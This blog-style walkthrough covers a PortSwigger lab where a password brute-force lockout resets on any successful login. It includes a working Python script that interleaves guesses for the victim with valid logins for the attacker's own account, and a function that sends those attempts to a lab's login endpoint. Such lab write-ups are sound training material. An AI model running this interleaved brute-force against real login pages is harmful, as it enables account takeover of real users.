Learning Web-Sec — Day 12 - Authentication Vulnerabilities

Broken Brute-Force Protection, IP Block - PortSwigger Lab

Nimish Dudhe (SecOvfShanks)
System Weakness


Follow me for more content like this; it keeps me motivated to write such detailed walk-throughs.

Lab 4 - Broken brute-force protection, IP block

Level: Practitioner

Description of Lab:

This lab is vulnerable due to a logic flaw in its password brute-force protection. To solve the lab, brute-force the victim’s password, then log in and access their account page.

Your credentials: wiener:peter

Victim’s username: carlos

Candidate passwords

Let's first see what responses we get when we try a wrong username and when we try a valid username with a wrong password.

Wrong Username
Wrong Password

The two error messages differ, so valid usernames can be enumerated from the login response.

After 3 invalid login attempts our IP address gets blocked, and we need to wait 1 minute before we can attempt to log in again. You can also try the technique we used earlier for bypassing IP-based brute-force protection and let me know if it works.

With further trial and error, we find that a successful login resets the IP block counter. So if every third attempt is a correct login (for example with our own credentials, wiener:peter), we never reach three consecutive failures and the IP is never blocked.

So, let's think of a way to script this from a terminal.

Algorithm:

1. Try the password at line i for carlos
2. Try the password at line i+1 for carlos
3. Log in with the right credentials (wiener:peter) to reset the counter
And continue this until all the passwords are tried

This is the logic I could think of. You can do it any other way you like. Also, if you read the description closely, we're already given the victim's username, so no username enumeration is needed for this lab.
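The interleaving described above, as an added example written for this walk-through (it is not the author's script or anything from PortSwigger). The `schedule` function produces the attempt order (two guesses for carlos, then one valid login as wiener), `LockoutSimulator` is a constructed, offline stand-in for the lab's flawed protection (block after three consecutive failures, counter reset on any success), and `http_login` shows how the same `login` callable would be built against a real lab instance. The lab URL, the `/login` form fields and the redirect to `/my-account` on success are assumptions about the lab, not something the page states.

```python
"""Interleaved brute force against a lockout that resets on a successful login."""
import http.cookiejar
import urllib.parse
import urllib.request

MAX_FAILURES = 3                       # third consecutive failure triggers the block
GUESSES_PER_ROUND = MAX_FAILURES - 1   # guesses we can afford before resetting


def schedule(victim, candidates, our_user, our_pass):
    """Yield (username, password) attempts: two guesses, then one valid login."""
    batch = []
    for pw in candidates:
        batch.append((victim, pw))
        if len(batch) == GUESSES_PER_ROUND:
            yield from batch
            yield (our_user, our_pass)   # a success resets the failure counter
            batch = []
    yield from batch                     # leftover guesses at the end of the list


def brute_force(login, victim, candidates, our_user, our_pass):
    """Run the schedule through login(user, pw) -> bool; return the found password."""
    for user, pw in schedule(victim, candidates, our_user, our_pass):
        if login(user, pw) and user == victim:
            return pw
    return None


class LockoutSimulator:
    """Constructed stand-in for the lab's flawed IP-block logic (no network)."""

    def __init__(self, users):
        self.users = users        # username -> password
        self.failures = 0         # consecutive failures from "our IP"
        self.blocked = False
        self.attempts = []        # every (user, pw) the scheduler sent

    def login(self, user, pw):
        self.attempts.append((user, pw))
        if self.blocked:
            return False          # real lab: "too many incorrect login attempts"
        if self.users.get(user) == pw:
            self.failures = 0     # the logic flaw: any successful login resets the counter
            return True
        self.failures += 1
        if self.failures >= MAX_FAILURES:
            self.blocked = True
        return False


def http_login(base_url):
    """Build a login callable for a real lab instance (assumed form fields and redirect)."""

    def login(user, pw):
        # Fresh cookie jar per attempt so every login starts a new session;
        # the lab's block is per IP, so the session does not affect the counter.
        opener = urllib.request.build_opener(
            urllib.request.HTTPCookieProcessor(http.cookiejar.CookieJar())
        )
        data = urllib.parse.urlencode({"username": user, "password": pw}).encode()
        with opener.open(base_url.rstrip("/") + "/login", data=data) as resp:
            # Assumption: a successful login redirects to /my-account, while a
            # wrong password or a blocked attempt returns the login page.
            return "/my-account" in resp.geturl()

    return login
```

To run it against the lab, pass the real login as the callable, with the lab hostname as a placeholder: `brute_force(http_login("https://YOUR-LAB-ID.web-security-academy.net"), "carlos", candidates, "wiener", "peter")`, where `candidates` is the lab's password list read from a file. Because a blocked attempt also returns the login page, it is worth watching the responses: if wiener's login ever comes back as a failure, the counter was not reset and the remaining guesses for that minute are wasted.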

From the responses we can tell that the password is 'batman': it is the only guess for carlos whose response differs from the incorrect-password and blocked responses. Let's now try logging in.

And boom!

We're in. Congratulations, people.


A cyber security + blockchain enthusiast who writes about web application penetration testing and blockchain network ecosystems.